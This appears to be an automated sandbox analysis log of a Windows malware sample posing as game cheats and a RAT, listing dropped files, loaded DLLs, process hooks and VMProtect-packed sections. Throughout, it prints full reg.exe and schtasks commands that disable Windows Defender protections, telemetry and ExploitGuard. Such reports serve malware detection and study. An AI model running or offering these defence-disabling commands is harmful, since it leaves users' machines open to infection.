                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: shfolder.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\wKj1CBkbos.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: wKj1CBkbos.exe | Static file information: File size 13565952 > 1048576
Source: wKj1CBkbos.exe | Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0xcede00
Source: 52cheatand52rat.exe.0.dr | Static PE information: 0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]
Source: initial sample | Static PE information: section where entry point is pointing to: .vmp1
Source: Lunch LaCheatV2.exe.3.dr | Static PE information: section name: .vmp0
Source: Lunch LaCheatV2.exe.3.dr | Static PE information: section name: .vmp1
Source: Lunch LaCheat.exe.6.dr | Static PE information: section name: .vmp0
Source: Lunch LaCheat.exe.6.dr | Static PE information: section name: .vmp1
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Code function: 2_2_00007FFD342B00BD pushad ; iretd 2_2_00007FFD342B00C1

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | File created: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe
Source: C:\Users\user\Desktop\wKj1CBkbos.exe | File created: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe
Source: C:\Users\user\Desktop\wKj1CBkbos.exe | File created: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe | File created: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe

Boot Survival

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Memory written: PID: 4788 base: 1EF0005 value: E9 2B BA 45 75
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Memory written: PID: 4788 base: 7734BA30 value: E9 DA 45 BA 8A
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Memory written: PID: 4788 base: 1F00008 value: E9 8B 8E 49 75
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Memory written: PID: 4788 base: 77398E90 value: E9 80 71 B6 8A
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Memory written: PID: 4788 base: 1F10005 value: E9 8B 4D A2 74
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Memory written: PID: 4788 base: 76934D90 value: E9 7A B2 5D 8B
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Memory written: PID: 4788 base: 38E0005 value: E9 EB EB 06 73
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Memory written: PID: 4788 base: 7694EBF0 value: E9 1A 14 F9 8C
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Memory written: PID: 4788 base: 38F0005 value: E9 8B 8A 03 72
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Memory written: PID: 4788 base: 75928A90 value: E9 7A 75 FC 8D
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Memory written: PID: 4788 base: 3900005 value: E9 2B 02 05 72
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Memory written: PID: 4788 base: 75950230 value: E9 DA FD FA 8D
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Memory written: PID: 4788 base: 3910005 value: E9 8B 2F A7 73
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Memory written: PID: 4788 base: 77382F90 value: E9 7A D0 58 8C
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Memory written: PID: 4788 base: 3920007 value: E9 EB DF A9 73
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe | Memory written: PID: 4788 base: 773BDFF0 value: E9 1E 20 56 8C
Source: C:\Users\user\Desktop\wKj1CBkbos.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe | Process information set: NOOPENFILEERRORBOX
